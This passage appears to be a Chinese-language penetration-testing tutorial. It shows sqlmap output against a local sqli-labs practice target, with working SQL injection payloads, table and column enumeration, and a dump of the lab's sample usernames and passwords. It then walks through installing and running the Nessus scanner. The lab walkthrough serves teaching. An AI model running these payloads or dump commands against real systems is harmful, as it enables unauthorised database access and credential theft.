Payload: id=-4651' UNION ALL SELECT NULL,NULL,CONCAT(0x717a767071,0x62496965714c765063665257444e644141445746534d51685a6d5a677970485155735271576f6356,0x7170707071)-- -
---
[05:25:29] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.5
[05:25:29] [INFO] fetching tables for database: 'security'
[05:25:29] [INFO] retrieved: 'emails'
[05:25:29] [INFO] retrieved: 'referers'
[05:25:29] [INFO] retrieved: 'uagents'
[05:25:29] [INFO] retrieved: 'users'
Database: security                                                                                                                                                                                                                        
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+
[05:25:29] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.10.131'
[*] ending @ 05:25:29 /2021-02-26/
  • 探测users表中所有列。
┌──(root💀kali)-[~/桌面]
└─# sqlmap -u "192.168.10.131/Less-1?id=1" -D security -T users --columns
___
__H__
___ ___[']_____ ___ ___  {1.5.2#stable}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
|_|V...       |_|   http://sqlmap.org                                                                                                                                                                                                
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 05:26:34 /2021-02-26/
[05:26:34] [INFO] resuming back-end DBMS 'mysql' 
[05:26:34] [INFO] testing connection to the target URL
got a 301 redirect to 'http://192.168.10.131/Less-1/?id=1'. Do you want to follow? [Y/n] 
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 4835=4835 AND 'SnrE'='SnrE
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a767071,(SELECT (ELT(3164=3164,1))),0x7170707071,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'WDxU'='WDxU
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6458 FROM (SELECT(SLEEP(5)))bmnB) AND 'xpdu'='xpdu
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-4651' UNION ALL SELECT NULL,NULL,CONCAT(0x717a767071,0x62496965714c765063665257444e644141445746534d51685a6d5a677970485155735271576f6356,0x7170707071)-- -
---
[05:26:36] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
[05:26:36] [INFO] fetching columns for table 'users' in database 'security'
[05:26:36] [INFO] retrieved: 'id','int(3)'
[05:26:36] [INFO] retrieved: 'username','varchar(20)'
[05:26:36] [INFO] retrieved: 'password','varchar(20)'
Database: security                                                                                                                                                                                                                        
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+
[05:26:36] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.10.131'
[*] ending @ 05:26:36 /2021-02-26/
  • 探测users表中username和password列的数据。
┌──(root💀kali)-[~/桌面]
└─# sqlmap -u "192.168.10.131/Less-1?id=1" -D security -T users -C "username,password" --dump
___
__H__
___ ___[']_____ ___ ___  {1.5.2#stable}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
|_|V...       |_|   http://sqlmap.org                                                                                                                                                                                               
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 05:28:07 /2021-02-26/
[05:28:07] [INFO] resuming back-end DBMS 'mysql' 
[05:28:07] [INFO] testing connection to the target URL
got a 301 redirect to 'http://192.168.10.131/Less-1/?id=1'. Do you want to follow? [Y/n] 
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 4835=4835 AND 'SnrE'='SnrE
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a767071,(SELECT (ELT(3164=3164,1))),0x7170707071,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'WDxU'='WDxU
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6458 FROM (SELECT(SLEEP(5)))bmnB) AND 'xpdu'='xpdu
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-4651' UNION ALL SELECT NULL,NULL,CONCAT(0x717a767071,0x62496965714c765063665257444e644141445746534d51685a6d5a677970485155735271576f6356,0x7170707071)-- -
---
[05:28:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
[05:28:08] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'security'
[05:28:08] [INFO] retrieved: 'Dumb','Dumb'
[05:28:08] [INFO] retrieved: 'I-kill-you','Angelina'
[05:28:08] [INFO] retrieved: 'p@ssword','Dummy'
[05:28:08] [INFO] retrieved: 'crappy','secure'
[05:28:08] [INFO] retrieved: 'stupidity','stupid'
[05:28:08] [INFO] retrieved: 'genious','superman'
[05:28:08] [INFO] retrieved: 'mob!le','batman'
[05:28:08] [INFO] retrieved: 'admin','admin'
[05:28:08] [INFO] retrieved: 'admin1','admin1'
[05:28:08] [INFO] retrieved: 'admin2','admin2'
[05:28:08] [INFO] retrieved: 'admin3','admin3'
[05:28:09] [INFO] retrieved: 'dumbo','dhakkan'
[05:28:09] [INFO] retrieved: 'admin4','admin4'
Database: security                                                                                                                                                                                                                        
Table: users
[13 entries]
+----------+------------+
| username | password   |
+----------+------------+
| Dumb     | Dumb       |
| Angelina | I-kill-you |
| Dummy    | p@ssword   |
| secure   | crappy     |
| stupid   | stupidity  |
| superman | genious    |
| batman   | mob!le     |
| admin    | admin      |
| admin1   | admin1     |
| admin2   | admin2     |
| admin3   | admin3     |
| dhakkan  | dumbo      |
| admin4   | admin4     |
+----------+------------+
[05:28:09] [INFO] table 'security.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.10.131/dump/security/users.csv'
[05:28:09] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.10.131'
[*] ending @ 05:28:09 /2021-02-26/

Nessus搭建与使用

搭建

  • 下载Nessus

下载地址:https://www.tenable.com/downloads/nessus

  • 安装Nessus
┌──(root💀kali)-[~/桌面]
└─# dpkg -i Nessus-8.13.1-debian6_amd64.deb                                 
正在选中未选择的软件包 nessus。
(正在读取数据库 ... 系统当前共安装有 307423 个文件和目录。)
准备解压 Nessus-8.13.1-debian6_amd64.deb  ...
正在解压 nessus (8.13.1) ...
正在设置 nessus (8.13.1) ...
Unpacking Nessus Scanner Core Components...
- You can start Nessus Scanner by typing /bin/systemctl start nessusd.service
- Then go to https://kali:8834/ to configure your scanner
  • 启动Nessus
┌──(root💀kali)-[~/桌面]
└─# systemctl start nessusd.service    
  • 使用firefox浏览器打开localhost:8834
┌──(root💀kali)-[~/桌面]
└─# firefox https://localhost:8834
  • 初始化Nessus

点击红框中的按钮。

  • 获取注册码

http://www.tenable.com/products/nessus/nessus-plugins/obtain-an-activation-code

  • 输入注册码

  • 创建一个用户

  • 开始安装

使用

  • 扫描网站,点击红色框框的按钮创建扫描。

  • 点击红框中的高级设置。

  • 设置基本信息。在文本框中填入信息后就点击save按钮。

  • 点击运行按钮。就会开始扫描了。